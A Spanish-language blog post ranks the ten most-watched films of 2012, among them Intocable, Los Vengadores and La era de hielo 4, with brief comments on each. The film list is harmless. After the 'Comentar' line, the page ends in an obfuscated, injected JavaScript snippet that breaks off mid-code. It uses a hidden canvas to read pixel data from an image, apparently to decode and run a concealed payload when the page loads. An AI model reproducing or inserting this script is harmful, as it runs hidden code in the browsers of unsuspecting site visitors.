Top películas más vistas 2012





Top películas más vistas 2012

En lo que va de éste año se han estrenado un sinfín de películas que le han venido a dar a la industria del cine lo que ellos busca, un poco de dinero y por supuesto complacer la pupila de quienes se consideran amantes del arte cinematográfico, lo que bien se puede decir que sí se a logrado aunque han salido películas de las cuales se esperaba mucho pero en realidad terminaron por decepcionar así que hoy quisimos traerte un top de las 10 películas más vistas en lo que va de éste 2/3 de año que ya se nos ha ido.

1. Intocable.- Película de origen francés que le ha venido a dar la vuelta a varias cintas de las que se esperaba mucho más y que sin embargo no dieron el ancho, se dice que dicha película ha ganado público gracias a la frescura con la cual fue presentada y sacada al mercado además de contar con una historia nueva, refrescante y cómica que agradó desde el momento de su estreno.

2. Los Vengadores.- Cinta que desde hace ya algunos años era esperada por los amantes del cine de acción y que en sus estreno no fue una decepción sino todo lo contrario, sus escenas tan fuera de lo común y su historia tan bien relatada hicieron de ésta película una de las más taquilleras en su estreno, aunado a esto se encuentra en la segunda posición como una de las más vistas en lo que va del 2012.

3. La era de hielo 4.- Divertida, atractiva, apta para pequeños y grandes son sólo algunos de los atributos que posee ésta cinta y que por lo consiguiente fue, es y a sido todo un hit del cual no se esperaba menos ya que desde el estreno de la primera parte se tenía pensado que sería todo un suceso.

4. Tengo ganas de ti.- El romance siempre atrae gente, atrae a parejas románticas y con ganas de ver una historia de amor que refleje lo que ellos sienten así que éstas películas generalmente tienen éxito, sobre todo cuando su contenido es bueno, cosa que ha sucedido con Tengo ganas de ti, así que el puesto #4 lo tiene muy bien merecido.

5.- Sherlock Holmes.- juego de sombras.- Misterio, acción y muchas ocasiones para pensar le dan un toque de misticismos a ésta película que llevaba sus añitos tratando de cocinarse pero que por una u otra razón no salía a la luz, pero como se puede ver ha tenido buenos resultados tanto así que le ha ganado a otras que se presumía tendrían más público a sus pies.

6.- Blanca Nieves y la leyenda del cazador.- Su frescura le a hecho que se convierta en algo que probablemente no se esperaba y que sorprendió para bien por algo ha sido aceptada en el público crítico del cine.

7.-  Los descendientes.- Las películas encargadas de entretener a la gente durante su duración suelen tener buena aceptación entre el público y es precisamente eso lo que le convierte en una cinta que promete estar mucho mejor posicionada a finales de año.

8.- Los juegos del hambre.- Aun no se le da el reconocimiento que se merece ésta gran película, hecha con mucho cuidado y seguro estoy aparecerá entre las 3 primeras cintas cinematográficas del año ya que tiene mucho que dar.

9.- The Lorax.- Cuando nos referimos a aquellos lanzamientos de los cuales tal vez no se esperaba mucho pero se obtuvo bastante éste es el gran ejemplo puesto que no era una película que resonara tanto pero sin duda a sorprendido.

10.- The Amazing Spider-Man.-  Aquí entramos con una película recién horneada y que tal vez con el paso del tiempo mejore posiciones, pero hoy por hoy no a rendido los frutos que se tenían pensado siendo muy afectada por su historia que no termina por destacar del todo.

 

Comentar

;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i